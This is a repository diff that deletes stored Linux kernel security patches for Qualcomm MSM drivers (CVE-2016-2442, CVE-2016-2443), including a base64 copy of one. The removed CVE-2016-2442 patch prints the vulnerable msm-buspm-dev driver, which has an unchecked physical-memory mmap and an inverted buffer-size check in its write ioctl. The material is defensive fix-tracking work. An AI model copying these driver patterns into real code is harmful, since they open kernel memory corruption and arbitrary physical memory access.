--static int msm_buspm_dev_release(struct inode *inode, struct file *filp)
--{
-- struct msm_buspm_map_dev *dev = filp->private_data;
--
-- msm_buspm_dev_free(filp);
-- kfree(dev);
-- filp->private_data = NULL;
--
-- return 0;
--}
--
--static int msm_buspm_dev_mmap(struct file *filp, struct vm_area_struct *vma)
--{
-- pr_debug("vma = 0x%p\n", vma);
--
-- /* Mappings are uncached */
-- vma->vm_page_prot = pgprot_noncached(vma->vm_page_prot);
-- if (remap_pfn_range(vma, vma->vm_start, vma->vm_pgoff,
-- vma->vm_end - vma->vm_start, vma->vm_page_prot))
-- return -EFAULT;
--
-- return 0;
--}
--
--#ifdef CONFIG_COMPAT
--static long
--msm_buspm_dev_compat_ioctl(struct file *filp, unsigned int cmd,
-- unsigned long arg)
--{
-- return msm_buspm_dev_ioctl(filp, cmd, (unsigned long)compat_ptr(arg));
--}
--#endif
--
--static int __init msm_buspm_dev_init(void)
--{
-- int ret = 0;
--
-- ret = misc_register(&msm_buspm_misc);
-- if (ret < 0) {
-- WARN_ON(1);
-- return ret;
-- }
--
-- if (msm_buspm_misc.this_device->coherent_dma_mask == 0)
-- msm_buspm_misc.this_device->coherent_dma_mask =
-- DMA_BIT_MASK(32);
--
-- return ret;
--}
--
--static void __exit msm_buspm_dev_exit(void)
--{
-- misc_deregister(&msm_buspm_misc);
--}
--module_init(msm_buspm_dev_init);
--module_exit(msm_buspm_dev_exit);
--
--MODULE_LICENSE("GPL v2");
--MODULE_VERSION("1.0");
--MODULE_ALIAS("platform:"MSM_BUSPM_DRV_NAME);
-diff --git a/drivers/platform/msm/msm_bus/msm_buspm_coresight_adhoc.c b/drivers/platform/msm/msm_bus/msm_buspm_coresight_adhoc.c
-index 9aec824..00b6e9a3 100644
---- a/drivers/platform/msm/msm_bus/msm_buspm_coresight_adhoc.c
-+++ b/drivers/platform/msm/msm_bus/msm_buspm_coresight_adhoc.c
-@@ -135,6 +135,7 @@ int msmbus_coresight_init_adhoc(struct platform_device *pdev,
- return PTR_ERR(pdata);
-
- drvdata = platform_get_drvdata(pdev);
-+ dev_info(dev, "info: removed buspm module from kernel space\n");
- if (IS_ERR_OR_NULL(drvdata)) {
- drvdata = devm_kzalloc(dev, sizeof(*drvdata), GFP_KERNEL);
- if (!drvdata) {
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2442/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2442/ANY/0001.patch
deleted file mode 100644
index ababce7e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2442/ANY/0001.patch
+++ /dev/null
@@ -1,605 +0,0 @@ -From 6fb29c4773f632b7b6c31a8de56f55c32de3d350 Mon Sep 17 00:00:00 2001 -From: Kiran Gunda -Date: Mon, 29 Feb 2016 13:27:50 +0530 -Subject: msm: msm_bus: remove the buspm module from kernel - -Remove the buspm module from msm_bus since it adds -no functionality to the bus bandwidth aggregation -driver. It is a loadable module used for profiling -purposes. - -Change-Id: Ia0d21eb7e48d3cb2a74d4fae5ee4fb2fd449ea9f -Signed-off-by: Kiran Gunda ---- - arch/arm/configs/msm8909_defconfig | 1 - - arch/arm/configs/msm8909w-perf_defconfig | 1 - - arch/arm/configs/msm8909w_defconfig | 1 - - arch/arm/configs/msm8937-perf_defconfig | 1 - - arch/arm/configs/msm8937_defconfig | 1 - - arch/arm/configs/msmcortex-perf_defconfig | 1 - - arch/arm/configs/msmcortex_defconfig | 1 - - arch/arm64/configs/msm-perf_defconfig | 1 - - arch/arm64/configs/msm8937-perf_defconfig | 1 - - arch/arm64/configs/msm8937_defconfig | 1 - - arch/arm64/configs/msm_defconfig | 1 - - arch/arm64/configs/msmcortex-perf_defconfig | 1 - - arch/arm64/configs/msmcortex_defconfig | 1 - - drivers/platform/msm/Kconfig | 9 - - drivers/platform/msm/msm_bus/Makefile | 1 - - drivers/platform/msm/msm_bus/msm-buspm-dev.c | 368 --------------------- - .../msm/msm_bus/msm_buspm_coresight_adhoc.c | 1 + - 17 files changed, 1 insertion(+), 391 deletions(-) - -diff --git a/arch/arm/configs/msm8909_defconfig b/arch/arm/configs/msm8909_defconfig -index a8ab18c..e2621aa 100644 ---- a/arch/arm/configs/msm8909_defconfig -+++ b/arch/arm/configs/msm8909_defconfig -@@ -383,7 +383,6 @@ CONFIG_ANDROID_LOW_MEMORY_KILLER=y - CONFIG_ION=y - CONFIG_ION_MSM=y - CONFIG_MSM_BUS_SCALING=y --CONFIG_MSM_BUSPM_DEV=m - CONFIG_BUS_TOPOLOGY_ADHOC=y - CONFIG_QPNP_REVID=y - CONFIG_SPS=y -diff --git a/arch/arm/configs/msm8909w-perf_defconfig b/arch/arm/configs/msm8909w-perf_defconfig -index e6a2585..435f97e 100644 ---- a/arch/arm/configs/msm8909w-perf_defconfig -+++ b/arch/arm/configs/msm8909w-perf_defconfig -@@ -407,7 +407,6 @@ 
CONFIG_ANDROID_LOW_MEMORY_KILLER=y - CONFIG_ION=y - CONFIG_ION_MSM=y - CONFIG_MSM_BUS_SCALING=y --CONFIG_MSM_BUSPM_DEV=m - CONFIG_BUS_TOPOLOGY_ADHOC=y - CONFIG_QPNP_POWER_ON=y - CONFIG_QPNP_REVID=y -diff --git a/arch/arm/configs/msm8909w_defconfig b/arch/arm/configs/msm8909w_defconfig -index 7e4d0308d..2a8c354 100644 ---- a/arch/arm/configs/msm8909w_defconfig -+++ b/arch/arm/configs/msm8909w_defconfig -@@ -409,7 +409,6 @@ CONFIG_ANDROID_LOW_MEMORY_KILLER=y - CONFIG_ION=y - CONFIG_ION_MSM=y - CONFIG_MSM_BUS_SCALING=y --CONFIG_MSM_BUSPM_DEV=m - CONFIG_BUS_TOPOLOGY_ADHOC=y - CONFIG_QPNP_POWER_ON=y - CONFIG_QPNP_REVID=y -diff --git a/arch/arm/configs/msm8937-perf_defconfig b/arch/arm/configs/msm8937-perf_defconfig -index fd0c4e9..48c10c8 100644 ---- a/arch/arm/configs/msm8937-perf_defconfig -+++ b/arch/arm/configs/msm8937-perf_defconfig -@@ -471,7 +471,6 @@ CONFIG_ION=y - CONFIG_ION_MSM=y - CONFIG_MSM_AVTIMER=y - CONFIG_MSM_BUS_SCALING=y --CONFIG_MSM_BUSPM_DEV=m - CONFIG_BUS_TOPOLOGY_ADHOC=y - CONFIG_QPNP_POWER_ON=y - CONFIG_QPNP_REVID=y -diff --git a/arch/arm/configs/msm8937_defconfig b/arch/arm/configs/msm8937_defconfig -index 0c3e1d1..0d89f31 100644 ---- a/arch/arm/configs/msm8937_defconfig -+++ b/arch/arm/configs/msm8937_defconfig -@@ -478,7 +478,6 @@ CONFIG_ION=y - CONFIG_ION_MSM=y - CONFIG_MSM_AVTIMER=y - CONFIG_MSM_BUS_SCALING=y --CONFIG_MSM_BUSPM_DEV=m - CONFIG_BUS_TOPOLOGY_ADHOC=y - CONFIG_QPNP_POWER_ON=y - CONFIG_QPNP_REVID=y -diff --git a/arch/arm/configs/msmcortex-perf_defconfig b/arch/arm/configs/msmcortex-perf_defconfig -index f41e11d..be65d54 100644 ---- a/arch/arm/configs/msmcortex-perf_defconfig -+++ b/arch/arm/configs/msmcortex-perf_defconfig -@@ -474,7 +474,6 @@ CONFIG_ION=y - CONFIG_ION_MSM=y - CONFIG_MSM_AVTIMER=y - CONFIG_MSM_BUS_SCALING=y --CONFIG_MSM_BUSPM_DEV=m - CONFIG_BUS_TOPOLOGY_ADHOC=y - CONFIG_QPNP_POWER_ON=y - CONFIG_QPNP_REVID=y -diff --git a/arch/arm/configs/msmcortex_defconfig b/arch/arm/configs/msmcortex_defconfig -index 
3306d6c..c58a80a 100644 ---- a/arch/arm/configs/msmcortex_defconfig -+++ b/arch/arm/configs/msmcortex_defconfig -@@ -475,7 +475,6 @@ CONFIG_ION=y - CONFIG_ION_MSM=y - CONFIG_MSM_AVTIMER=y - CONFIG_MSM_BUS_SCALING=y --CONFIG_MSM_BUSPM_DEV=m - CONFIG_BUS_TOPOLOGY_ADHOC=y - CONFIG_QPNP_POWER_ON=y - CONFIG_QPNP_REVID=y -diff --git a/arch/arm64/configs/msm-perf_defconfig b/arch/arm64/configs/msm-perf_defconfig -index c2c0232..05efc6f 100644 ---- a/arch/arm64/configs/msm-perf_defconfig -+++ b/arch/arm64/configs/msm-perf_defconfig -@@ -479,7 +479,6 @@ CONFIG_ION=y - CONFIG_ION_MSM=y - CONFIG_MSM_AVTIMER=y - CONFIG_MSM_BUS_SCALING=y --CONFIG_MSM_BUSPM_DEV=m - CONFIG_BUS_TOPOLOGY_ADHOC=y - CONFIG_QPNP_POWER_ON=y - CONFIG_QPNP_REVID=y -diff --git a/arch/arm64/configs/msm8937-perf_defconfig b/arch/arm64/configs/msm8937-perf_defconfig -index c697e1f..e10acc8 100644 ---- a/arch/arm64/configs/msm8937-perf_defconfig -+++ b/arch/arm64/configs/msm8937-perf_defconfig -@@ -484,7 +484,6 @@ CONFIG_ION=y - CONFIG_ION_MSM=y - CONFIG_MSM_AVTIMER=y - CONFIG_MSM_BUS_SCALING=y --CONFIG_MSM_BUSPM_DEV=m - CONFIG_BUS_TOPOLOGY_ADHOC=y - CONFIG_QPNP_POWER_ON=y - CONFIG_QPNP_REVID=y -diff --git a/arch/arm64/configs/msm8937_defconfig b/arch/arm64/configs/msm8937_defconfig -index b05e721c..3342d55 100644 ---- a/arch/arm64/configs/msm8937_defconfig -+++ b/arch/arm64/configs/msm8937_defconfig -@@ -488,7 +488,6 @@ CONFIG_ION=y - CONFIG_ION_MSM=y - CONFIG_MSM_AVTIMER=y - CONFIG_MSM_BUS_SCALING=y --CONFIG_MSM_BUSPM_DEV=m - CONFIG_BUS_TOPOLOGY_ADHOC=y - CONFIG_QPNP_POWER_ON=y - CONFIG_QPNP_REVID=y -diff --git a/arch/arm64/configs/msm_defconfig b/arch/arm64/configs/msm_defconfig -index 3d907ce..7054eb2 100644 ---- a/arch/arm64/configs/msm_defconfig -+++ b/arch/arm64/configs/msm_defconfig -@@ -485,7 +485,6 @@ CONFIG_ION=y - CONFIG_ION_MSM=y - CONFIG_MSM_AVTIMER=y - CONFIG_MSM_BUS_SCALING=y --CONFIG_MSM_BUSPM_DEV=m - CONFIG_BUS_TOPOLOGY_ADHOC=y - CONFIG_DEBUG_BUS_VOTER=y - CONFIG_QPNP_POWER_ON=y -diff --git 
a/arch/arm64/configs/msmcortex-perf_defconfig b/arch/arm64/configs/msmcortex-perf_defconfig -index b3292ed..d0b9681 100644 ---- a/arch/arm64/configs/msmcortex-perf_defconfig -+++ b/arch/arm64/configs/msmcortex-perf_defconfig -@@ -487,7 +487,6 @@ CONFIG_ION=y - CONFIG_ION_MSM=y - CONFIG_MSM_AVTIMER=y - CONFIG_MSM_BUS_SCALING=y --CONFIG_MSM_BUSPM_DEV=m - CONFIG_BUS_TOPOLOGY_ADHOC=y - CONFIG_QPNP_POWER_ON=y - CONFIG_QPNP_REVID=y -diff --git a/arch/arm64/configs/msmcortex_defconfig b/arch/arm64/configs/msmcortex_defconfig -index a0176f1..8d449f9 100644 ---- a/arch/arm64/configs/msmcortex_defconfig -+++ b/arch/arm64/configs/msmcortex_defconfig -@@ -491,7 +491,6 @@ CONFIG_ION=y - CONFIG_ION_MSM=y - CONFIG_MSM_AVTIMER=y - CONFIG_MSM_BUS_SCALING=y --CONFIG_MSM_BUSPM_DEV=m - CONFIG_BUS_TOPOLOGY_ADHOC=y - CONFIG_QPNP_POWER_ON=y - CONFIG_QPNP_REVID=y -diff --git a/drivers/platform/msm/Kconfig b/drivers/platform/msm/Kconfig -index d1fabe1..b0a9a54 100644 ---- a/drivers/platform/msm/Kconfig -+++ b/drivers/platform/msm/Kconfig -@@ -16,15 +16,6 @@ config MSM_BUS_SCALING - for the active devices needs without keeping the clocks at max - frequency when a slower speed is sufficient. - --config MSM_BUSPM_DEV -- tristate "MSM Bus Performance Monitor Kernel Module" -- depends on MSM_BUS_SCALING -- help -- This kernel module is used to mmap() hardware registers for the -- performance monitors, counters, etc. 
The module can also be used to -- allocate physical memory which is used by bus performance hardware to -- dump performance data -- - config BUS_TOPOLOGY_ADHOC - bool "ad-hoc bus scaling topology" - help -diff --git a/drivers/platform/msm/msm_bus/Makefile b/drivers/platform/msm/msm_bus/Makefile -index fec4537..a58994d 100644 ---- a/drivers/platform/msm/msm_bus/Makefile -+++ b/drivers/platform/msm/msm_bus/Makefile -@@ -24,4 +24,3 @@ endif - - - obj-$(CONFIG_DEBUG_FS) += msm_bus_dbg.o --obj-$(CONFIG_MSM_BUSPM_DEV) += msm-buspm-dev.o -diff --git a/drivers/platform/msm/msm_bus/msm-buspm-dev.c b/drivers/platform/msm/msm_bus/msm-buspm-dev.c -index 4d9262b..e69de29 100644 ---- a/drivers/platform/msm/msm_bus/msm-buspm-dev.c -+++ b/drivers/platform/msm/msm_bus/msm-buspm-dev.c -@@ -1,368 +0,0 @@ --/* Copyright (c) 2011-2015, The Linux Foundation. All rights reserved. -- * -- * This program is free software; you can redistribute it and/or modify -- * it under the terms of the GNU General Public License version 2 and -- * only version 2 as published by the Free Software Foundation. -- * -- * This program is distributed in the hope that it will be useful, -- * but WITHOUT ANY WARRANTY; without even the implied warranty of -- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -- * GNU General Public License for more details. 
-- */ -- --/* #define DEBUG */ -- --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include -- --#define MSM_BUSPM_DRV_NAME "msm-buspm-dev" -- --#ifdef CONFIG_COMPAT --static long --msm_buspm_dev_compat_ioctl(struct file *filp, unsigned int cmd, -- unsigned long arg); --#else --#define msm_buspm_dev_compat_ioctl NULL --#endif -- --static long --msm_buspm_dev_ioctl(struct file *filp, unsigned int cmd, unsigned long arg); --static int msm_buspm_dev_mmap(struct file *filp, struct vm_area_struct *vma); --static int msm_buspm_dev_release(struct inode *inode, struct file *filp); --static int msm_buspm_dev_open(struct inode *inode, struct file *filp); -- --static const struct file_operations msm_buspm_dev_fops = { -- .owner = THIS_MODULE, -- .mmap = msm_buspm_dev_mmap, -- .open = msm_buspm_dev_open, -- .unlocked_ioctl = msm_buspm_dev_ioctl, -- .compat_ioctl = msm_buspm_dev_compat_ioctl, -- .llseek = noop_llseek, -- .release = msm_buspm_dev_release, --}; -- --struct miscdevice msm_buspm_misc = { -- .minor = MISC_DYNAMIC_MINOR, -- .name = MSM_BUSPM_DRV_NAME, -- .fops = &msm_buspm_dev_fops, --}; -- -- --enum msm_buspm_spdm_res { -- SPDM_RES_ID = 0, -- SPDM_RES_TYPE = 0x63707362, -- SPDM_KEY = 0x00006e65, -- SPDM_SIZE = 4, --}; --/* -- * Allocate kernel buffer. -- * Currently limited to one buffer per file descriptor. If alloc() is -- * called twice for the same descriptor, the original buffer is freed. -- * There is also no locking protection so the same descriptor can not be shared. -- */ -- --static inline void *msm_buspm_dev_get_vaddr(struct file *filp) --{ -- struct msm_buspm_map_dev *dev = filp->private_data; -- -- return (dev) ? dev->vaddr : NULL; --} -- --static inline unsigned int msm_buspm_dev_get_buflen(struct file *filp) --{ -- struct msm_buspm_map_dev *dev = filp->private_data; -- -- return dev ? 
dev->buflen : 0; --} -- --static inline unsigned long msm_buspm_dev_get_paddr(struct file *filp) --{ -- struct msm_buspm_map_dev *dev = filp->private_data; -- -- return (dev) ? dev->paddr : 0L; --} -- --static void msm_buspm_dev_free(struct file *filp) --{ -- struct msm_buspm_map_dev *dev = filp->private_data; -- -- if (dev && dev->vaddr) { -- pr_debug("freeing memory at 0x%p\n", dev->vaddr); -- dma_free_coherent(msm_buspm_misc.this_device, dev->buflen, -- dev->vaddr, dev->paddr); -- dev->paddr = 0L; -- dev->vaddr = NULL; -- } --} -- --static int msm_buspm_dev_open(struct inode *inode, struct file *filp) --{ -- struct msm_buspm_map_dev *dev; -- -- if (capable(CAP_SYS_ADMIN)) { -- dev = kzalloc(sizeof(*dev), GFP_KERNEL); -- if (dev) -- filp->private_data = dev; -- else -- return -ENOMEM; -- } else { -- return -EPERM; -- } -- -- return 0; --} -- --static int --msm_buspm_dev_alloc(struct file *filp, struct buspm_alloc_params data) --{ -- dma_addr_t paddr; -- void *vaddr; -- struct msm_buspm_map_dev *dev = filp->private_data; -- -- /* If buffer already allocated, then free it */ -- if (dev->vaddr) -- msm_buspm_dev_free(filp); -- -- /* Allocate uncached memory */ -- vaddr = dma_alloc_coherent(msm_buspm_misc.this_device, data.size, -- &paddr, GFP_KERNEL); -- -- if (vaddr == NULL) { -- pr_err("allocation of 0x%zu bytes failed", data.size); -- return -ENOMEM; -- } -- -- dev->vaddr = vaddr; -- dev->paddr = paddr; -- dev->buflen = data.size; -- filp->f_pos = 0; -- pr_debug("virt addr = 0x%p\n", dev->vaddr); -- pr_debug("phys addr = 0x%lx\n", dev->paddr); -- -- return 0; --} -- --static int msm_bus_rpm_req(u32 rsc_type, u32 key, u32 hwid, -- int ctx, u32 val) --{ -- struct msm_rpm_request *rpm_req; -- int ret, msg_id; -- -- rpm_req = msm_rpm_create_request(ctx, rsc_type, SPDM_RES_ID, 1); -- if (rpm_req == NULL) { -- pr_err("RPM: Couldn't create RPM Request\n"); -- return -ENXIO; -- } -- -- ret = msm_rpm_add_kvp_data(rpm_req, key, (const uint8_t *)&val, -- 
(int)(sizeof(uint32_t))); -- if (ret) { -- pr_err("RPM: Add KVP failed for RPM Req:%u\n", -- rsc_type); -- goto err; -- } -- -- pr_debug("Added Key: %d, Val: %u, size: %zu\n", key, -- (uint32_t)val, sizeof(uint32_t)); -- msg_id = msm_rpm_send_request(rpm_req); -- if (!msg_id) { -- pr_err("RPM: No message ID for req\n"); -- ret = -ENXIO; -- goto err; -- } -- -- ret = msm_rpm_wait_for_ack(msg_id); -- if (ret) { -- pr_err("RPM: Ack failed\n"); -- goto err; -- } -- --err: -- msm_rpm_free_request(rpm_req); -- return ret; --} -- --static int msm_buspm_ioc_cmds(uint32_t arg) --{ -- switch (arg) { -- case MSM_BUSPM_SPDM_CLK_DIS: -- case MSM_BUSPM_SPDM_CLK_EN: -- return msm_bus_rpm_req(SPDM_RES_TYPE, SPDM_KEY, 0, -- MSM_RPM_CTX_ACTIVE_SET, arg); -- default: -- pr_warn("Unsupported ioctl command: %d\n", arg); -- return -EINVAL; -- } --} -- -- -- --static long --msm_buspm_dev_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) --{ -- struct buspm_xfer_req xfer; -- struct buspm_alloc_params alloc_data; -- unsigned long paddr; -- int retval = 0; -- void *buf = msm_buspm_dev_get_vaddr(filp); -- unsigned int buflen = msm_buspm_dev_get_buflen(filp); -- unsigned char *dbgbuf = buf; -- -- if (_IOC_TYPE(cmd) != MSM_BUSPM_IOC_MAGIC) { -- pr_err("Wrong IOC_MAGIC.Exiting\n"); -- return -ENOTTY; -- } -- -- switch (cmd) { -- case MSM_BUSPM_IOC_FREE: -- pr_debug("cmd = 0x%x (FREE)\n", cmd); -- msm_buspm_dev_free(filp); -- break; -- -- case MSM_BUSPM_IOC_ALLOC: -- pr_debug("cmd = 0x%x (ALLOC)\n", cmd); -- retval = __get_user(alloc_data.size, (uint32_t __user *)arg); -- -- if (retval == 0) -- retval = msm_buspm_dev_alloc(filp, alloc_data); -- break; -- -- case MSM_BUSPM_IOC_RD_PHYS_ADDR: -- pr_debug("Read Physical Address\n"); -- paddr = msm_buspm_dev_get_paddr(filp); -- if (paddr == 0L) { -- retval = -EINVAL; -- } else { -- pr_debug("phys addr = 0x%lx\n", paddr); -- retval = __put_user(paddr, -- (unsigned long __user *)arg); -- } -- break; -- -- case MSM_BUSPM_IOC_RDBUF: -- if 
(!buf) { -- retval = -EINVAL; -- break; -- } -- -- pr_debug("Read Buffer: 0x%x%x%x%x\n", -- dbgbuf[0], dbgbuf[1], dbgbuf[2], dbgbuf[3]); -- -- if (copy_from_user(&xfer, (void __user *)arg, sizeof(xfer))) { -- retval = -EFAULT; -- break; -- } -- -- if ((xfer.size <= buflen) && -- (copy_to_user((void __user *)xfer.data, buf, -- xfer.size))) { -- retval = -EFAULT; -- break; -- } -- break; -- -- case MSM_BUSPM_IOC_WRBUF: -- pr_debug("Write Buffer\n"); -- -- if (!buf) { -- retval = -EINVAL; -- break; -- } -- -- if (copy_from_user(&xfer, (void __user *)arg, sizeof(xfer))) { -- retval = -EFAULT; -- break; -- } -- -- if ((buflen <= xfer.size) && -- (copy_from_user(buf, (void __user *)xfer.data, -- xfer.size))) { -- retval = -EFAULT; -- break; -- } -- break; -- -- case MSM_BUSPM_IOC_CMD: -- pr_debug("IOCTL command: cmd: %d arg: %lu\n", cmd, arg); -- retval = msm_buspm_ioc_cmds(arg); -- break; -- -- default: -- pr_debug("Unknown command 0x%x\n", cmd); -- retval = -EINVAL; -- break; -- } -- -- return retval; --} -- --static int msm_buspm_dev_release(struct inode *inode, struct file *filp) --{ -- struct msm_buspm_map_dev *dev = filp->private_data; -- -- msm_buspm_dev_free(filp); -- kfree(dev); -- filp->private_data = NULL; -- -- return 0; --} -- --static int msm_buspm_dev_mmap(struct file *filp, struct vm_area_struct *vma) --{ -- pr_debug("vma = 0x%p\n", vma); -- -- /* Mappings are uncached */ -- vma->vm_page_prot = pgprot_noncached(vma->vm_page_prot); -- if (remap_pfn_range(vma, vma->vm_start, vma->vm_pgoff, -- vma->vm_end - vma->vm_start, vma->vm_page_prot)) -- return -EFAULT; -- -- return 0; --} -- --#ifdef CONFIG_COMPAT --static long --msm_buspm_dev_compat_ioctl(struct file *filp, unsigned int cmd, -- unsigned long arg) --{ -- return msm_buspm_dev_ioctl(filp, cmd, (unsigned long)compat_ptr(arg)); --} --#endif -- --static int __init msm_buspm_dev_init(void) --{ -- int ret = 0; -- -- ret = misc_register(&msm_buspm_misc); -- if (ret < 0) { -- WARN_ON(1); -- return ret; -- } 
-- -- if (msm_buspm_misc.this_device->coherent_dma_mask == 0) -- msm_buspm_misc.this_device->coherent_dma_mask = -- DMA_BIT_MASK(32); -- -- return ret; --} -- --static void __exit msm_buspm_dev_exit(void) --{ -- misc_deregister(&msm_buspm_misc); --} --module_init(msm_buspm_dev_init); --module_exit(msm_buspm_dev_exit); -- --MODULE_LICENSE("GPL v2"); --MODULE_VERSION("1.0"); --MODULE_ALIAS("platform:"MSM_BUSPM_DRV_NAME); -diff --git a/drivers/platform/msm/msm_bus/msm_buspm_coresight_adhoc.c b/drivers/platform/msm/msm_bus/msm_buspm_coresight_adhoc.c -index 9aec824..00b6e9a3 100644 ---- a/drivers/platform/msm/msm_bus/msm_buspm_coresight_adhoc.c -+++ b/drivers/platform/msm/msm_bus/msm_buspm_coresight_adhoc.c -@@ -135,6 +135,7 @@ int msmbus_coresight_init_adhoc(struct platform_device *pdev, - return PTR_ERR(pdata); - - drvdata = platform_get_drvdata(pdev); -+ dev_info(dev, "info: removed buspm module from kernel space\n"); - if (IS_ERR_OR_NULL(drvdata)) { - drvdata = devm_kzalloc(dev, sizeof(*drvdata), GFP_KERNEL); - if (!drvdata) { --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-2443/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2443/ANY/0001.patch deleted file mode 100644 index d641d536..00000000 --- a/Patches/Linux_CVEs/CVE-2016-2443/ANY/0001.patch +++ /dev/null 
@@ -1,52 +0,0 @@
-diff --git a/drivers/video/msm/Kconfig b/drivers/video/msm/Kconfig
-index 590723a..30ce98f 100644
---- a/drivers/video/msm/Kconfig
-+++ b/drivers/video/msm/Kconfig
-@@ -44,6 +44,11 @@
- config FB_MSM_MDSS_COMMON
- bool
- 
-+config MDP_DEBUG_FS
-+ depends on DEBUG_FS
-+ bool "MDP Debug FS"
-+ default n
-+
- choice
- prompt "MDP HW version"
- default FB_MSM_MDP22
-diff --git a/drivers/video/msm/Makefile b/drivers/video/msm/Makefile
-index 67c6b48..d26fe58 100644
---- a/drivers/video/msm/Makefile
-+++ b/drivers/video/msm/Makefile
-@@ -9,8 +9,7 @@
- ifeq ($(CONFIG_FB_MSM_MDP_HW),y)
- # MDP
- obj-y += mdp.o
--
--obj-$(CONFIG_DEBUG_FS) += mdp_debugfs.o
-+obj-$(CONFIG_MDP_DEBUG_FS) += mdp_debugfs.o
- 
- ifeq ($(CONFIG_FB_MSM_MDP40),y)
- obj-y += mdp4_util.o
-diff --git a/drivers/video/msm/mdp.c b/drivers/video/msm/mdp.c
-index 7d6d448..7a59d51 100644
---- a/drivers/video/msm/mdp.c
-+++ b/drivers/video/msm/mdp.c
-@@ -2,7 +2,7 @@
- *
- * MSM MDP Interface (used by framebuffer core)
- *
-- * Copyright (c) 2007-2012, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2007-2013, 2016 The Linux Foundation. All rights reserved.
- * Copyright (C) 2007 Google Incorporated
- *
- * This software is licensed under the terms of the GNU General Public
-@@ -3257,7 +3257,7 @@
- return ret;
- }
- 
--#if defined(CONFIG_DEBUG_FS)
-+#if defined(CONFIG_MDP_DEBUG_FS)
- mdp_debugfs_init();
- #endif
- 
diff --git a/Patches/Linux_CVEs/CVE-2016-2443/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2016-2443/ANY/0001.patch.base64
deleted file mode 100644
index ccc8c519..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2443/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@ -ZGlmZiAtLWdpdCBhL2RyaXZlcnMvdmlkZW8vbXNtL0tjb25maWcgYi9kcml2ZXJzL3ZpZGVvL21zbS9LY29uZmlnCmluZGV4IDU5MDcyM2EuLjMwY2U5OGYgMTAwNjQ0Ci0tLSBhL2RyaXZlcnMvdmlkZW8vbXNtL0tjb25maWcKKysrIGIvZHJpdmVycy92aWRlby9tc20vS2NvbmZpZwpAQCAtNDQsNiArNDQsMTEgQEAKIGNvbmZpZyBGQl9NU01fTURTU19DT01NT04KIAlib29sCiAKK2NvbmZpZyBNRFBfREVCVUdfRlMKKwlkZXBlbmRzIG9uIERFQlVHX0ZTCisJYm9vbCAiTURQIERlYnVnIEZTIgorCWRlZmF1bHQgbgorCiBjaG9pY2UKIAlwcm9tcHQgIk1EUCBIVyB2ZXJzaW9uIgogCWRlZmF1bHQgRkJfTVNNX01EUDIyCmRpZmYgLS1naXQgYS9kcml2ZXJzL3ZpZGVvL21zbS9NYWtlZmlsZSBiL2RyaXZlcnMvdmlkZW8vbXNtL01ha2VmaWxlCmluZGV4IDY3YzZiNDguLmQyNmZlNTggMTAwNjQ0Ci0tLSBhL2RyaXZlcnMvdmlkZW8vbXNtL01ha2VmaWxlCisrKyBiL2RyaXZlcnMvdmlkZW8vbXNtL01ha2VmaWxlCkBAIC05LDggKzksNyBAQAogaWZlcSAoJChDT05GSUdfRkJfTVNNX01EUF9IVykseSkKICMgTURQCiBvYmoteSArPSBtZHAubwotCi1vYmotJChDT05GSUdfREVCVUdfRlMpICs9IG1kcF9kZWJ1Z2ZzLm8KK29iai0kKENPTkZJR19NRFBfREVCVUdfRlMpICs9IG1kcF9kZWJ1Z2ZzLm8KIAogaWZlcSAoJChDT05GSUdfRkJfTVNNX01EUDQwKSx5KQogb2JqLXkgKz0gbWRwNF91dGlsLm8KZGlmZiAtLWdpdCBhL2RyaXZlcnMvdmlkZW8vbXNtL21kcC5jIGIvZHJpdmVycy92aWRlby9tc20vbWRwLmMKaW5kZXggN2Q2ZDQ0OC4uN2E1OWQ1MSAxMDA2NDQKLS0tIGEvZHJpdmVycy92aWRlby9tc20vbWRwLmMKKysrIGIvZHJpdmVycy92aWRlby9tc20vbWRwLmMKQEAgLTIsNyArMiw3IEBACiAgKgogICogTVNNIE1EUCBJbnRlcmZhY2UgKHVzZWQgYnkgZnJhbWVidWZmZXIgY29yZSkKICAqCi0gKiBDb3B5cmlnaHQgKGMpIDIwMDctMjAxMiwgVGhlIExpbnV4IEZvdW5kYXRpb24uIEFsbCByaWdodHMgcmVzZXJ2ZWQuCisgKiBDb3B5cmlnaHQgKGMpIDIwMDctMjAxMywgMjAxNiBUaGUgTGludXggRm91bmRhdGlvbi4gQWxsIHJpZ2h0cyByZXNlcnZlZC4KICAqIENvcHlyaWdodCAoQykgMjAwNyBHb29nbGUgSW5jb3Jwb3JhdGVkCiAgKgogICogVGhpcyBzb2Z0d2FyZSBpcyBsaWNlbnNlZCB1bmRlciB0aGUgdGVybXMgb2YgdGhlIEdOVSBHZW5lcmFsIFB1YmxpYwpAQCAtMzI1Nyw3ICszMjU3LDcgQEAKIAkJcmV0dXJuIHJldDsKIAl9CiAKLSNpZiBkZWZpbmVkKENPTkZJR19ERUJVR19GUykKKyNpZiBkZWZpbmVkKENPTkZJR19NRFBfREVCVUdfRlMpCiAJbWRwX2RlYnVnZnNfaW5pdCgpOwogI2VuZGlmCiAK \ No newline at end of file 
diff --git a/Patches/Linux_CVEs/CVE-2016-2465/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-2465/3.10/0001.patch
deleted file mode 100644
index 8c7ea9e4..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2465/3.10/0001.patch
+++ /dev/null
